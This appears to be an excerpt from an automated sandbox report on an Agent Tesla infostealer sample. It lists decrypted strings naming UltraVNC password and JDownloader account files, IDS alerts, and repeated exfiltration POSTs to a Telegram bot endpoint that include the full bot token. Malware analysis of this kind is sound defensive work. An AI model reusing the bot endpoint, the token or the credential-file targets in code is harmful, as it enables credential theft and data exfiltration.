                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd2
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd2
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: passwd2
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpackString decryptor: JDownloader 2.0\cfg

                        Exploits

                        barindex
                        Source: Yara matchFile source: 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO54782322024.exe PID: 6844, type: MEMORYSTR
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49881 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49882 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49908 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49909 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49915 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49921 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49948 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49969 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50028 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50030 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50032 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50036 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50037 version: TLS 1.2
                        Source: PO54782322024.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F0439D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*+T source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.pdb`w. source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: RegSvcs.pdb, source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0K source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: RegSvcs.pdb source: AppPoint.exe, 00000006.00000000.1791457850.0000000000DA2000.00000002.00000001.01000000.00000009.sdmp, AppPoint.exe.2.dr
                        Source: Binary string: .pdbHJ source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbnt[ source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbuery actR source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: C:\Users\user\Desktop\PO54782322024.exe11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb64\v4.0.30319\diasymreader.dll source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb13 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.pdbPD source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb~?5 source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PO54782322024.exe, 00000000.00000002.1904314396.0000017F04322000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: mscorlib.pdbP source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: 9nlpC:\Users\user\Desktop\PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: PO54782322024.PDB source: PO54782322024.exe, 00000000.00000002.1904079587.0000006C6E393000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER3F0B.tmp.dmp.5.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER3F0B.tmp.dmp.5.dr

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49734 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49732 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49732 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49734
                        Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49732
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49849 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49817 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49817 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49915 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49861 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49817
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49818 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49882 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49968 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49909 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49948 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50028 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50029 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50030 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50031 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50036 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50000 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49921 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50006 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50034 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50032 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50035 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49969 -> 149.154.167.220:443
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd15a4f24f5ee0Host: api.telegram.orgContent-Length: 6683Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd20d7ce7df7a9Host: api.telegram.orgContent-Length: 930Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd20dd74936aabHost: api.telegram.orgContent-Length: 66950Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd26c0b81f4a09Host: api.telegram.orgContent-Length: 66950Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2db458e448f1Host: api.telegram.orgContent-Length: 66950Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd33c42d569f7aHost: api.telegram.orgContent-Length: 66950Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3e24c46652e2Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4046245e9326Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd42db9af1601bHost: api.telegram.orgContent-Length: 66946Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4a9ba686c827Host: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4ec7e1fd0ec5Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50f26f7fcbb6Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd567673718542Host: api.telegram.orgContent-Length: 66946Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd590601fddccaHost: api.telegram.orgContent-Length: 66946Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6453ae6e3e4eHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6834711be7f9Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6b8cf29bbe5cHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fcfbb3027c3Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd725dd3d8b1e0Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd7790d94bd903Host: api.telegram.orgContent-Length: 68584Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd7eb6d4e31816Host: api.telegram.orgContent-Length: 67091Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd821a08413a24Host: api.telegram.orgContent-Length: 66944Expect: 100-continue
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: unknownHTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1587a9f4ac63Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: AppPoint.exe, 00000006.00000002.1794954358.00000000014A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002F3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
                        Source: RegSvcs.exe, 00000002.00000002.4116925393.0000000002B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
